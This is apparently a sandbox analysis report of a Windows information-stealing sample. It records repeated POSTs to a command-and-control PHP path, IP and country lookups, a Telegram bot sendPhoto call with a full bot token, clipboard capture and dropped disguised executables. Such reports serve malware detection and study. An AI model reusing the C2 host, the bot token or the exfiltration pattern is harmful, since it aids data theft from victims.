Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2164Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: unknown HTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"Host: api.telegram.orgContent-Length: 100984Expect: 100-continueConnection: Keep-Alive
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000384B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000017.00000002.3244330908.000002B847530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhotoX
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000033.00000003.2049334674.000001F0A8E1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.3244405482.0000023E3B510000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 0000001A.00000002.3163703892.0000014AE8FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5Consumers
Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000378A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/country
Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: XrKvE5hfPM.49.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window created: window name: CLIPBRDWNDCLASS
Creates files inside the system directory
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Deletes files inside the Windows folder
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9B890DA8 0_2_00007FFD9B890DA8
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BA0018F 0_2_00007FFD9BA0018F
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Code function: 0_2_00007FFD9BC61B7F 0_2_00007FFD9BC61B7F
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B899FAF 19_2_00007FFD9B899FAF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8991DF 19_2_00007FFD9B8991DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B880DA8 19_2_00007FFD9B880DA8
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C312D 19_2_00007FFD9B8C312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8CB58D 19_2_00007FFD9B8CB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8CF886 19_2_00007FFD9B8CF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B899FAF 20_2_00007FFD9B899FAF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8991DF 20_2_00007FFD9B8991DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8C312D 20_2_00007FFD9B8C312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8CB58D 20_2_00007FFD9B8CB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B8CF886 20_2_00007FFD9B8CF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 20_2_00007FFD9B880DA8 20_2_00007FFD9B880DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8A0DA8 21_2_00007FFD9B8A0DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8B9FAF 21_2_00007FFD9B8B9FAF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8B91DF 21_2_00007FFD9B8B91DF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8E312D 21_2_00007FFD9B8E312D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8EB58D 21_2_00007FFD9B8EB58D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 21_2_00007FFD9B8EF886 21_2_00007FFD9B8EF886
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B880DA8 22_2_00007FFD9B880DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8C312D 22_2_00007FFD9B8C312D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8CB58D 22_2_00007FFD9B8CB58D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8CF886 22_2_00007FFD9B8CF886
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B899FAF 22_2_00007FFD9B899FAF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 22_2_00007FFD9B8991DF 22_2_00007FFD9B8991DF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFD9B9630E9 28_2_00007FFD9B9630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FFD9B9730E9 30_2_00007FFD9B9730E9
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8D312D 38_2_00007FFD9B8D312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8DB58D 38_2_00007FFD9B8DB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8DF886 38_2_00007FFD9B8DF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8A9FAF 38_2_00007FFD9B8A9FAF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B8A91DF 38_2_00007FFD9B8A91DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 38_2_00007FFD9B890DA8 38_2_00007FFD9B890DA8
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 40_2_00007FFD9B8A0DA8 40_2_00007FFD9B8A0DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8A0DA8 41_2_00007FFD9B8A0DA8
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8B9FAF 41_2_00007FFD9B8B9FAF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8B91DF 41_2_00007FFD9B8B91DF
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8E312D 41_2_00007FFD9B8E312D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8EB58D 41_2_00007FFD9B8EB58D
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 41_2_00007FFD9B8EF886 41_2_00007FFD9B8EF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B880DA8 44_2_00007FFD9B880DA8
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B899EDD 44_2_00007FFD9B899EDD
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8991DF 44_2_00007FFD9B8991DF
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8C312D 44_2_00007FFD9B8C312D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8CF886 44_2_00007FFD9B8CF886
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B8CB58D 44_2_00007FFD9B8CB58D
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 44_2_00007FFD9B9F018F 44_2_00007FFD9B9F018F
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BazpdGXT.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
Sample file is different than original file name gathered from version info
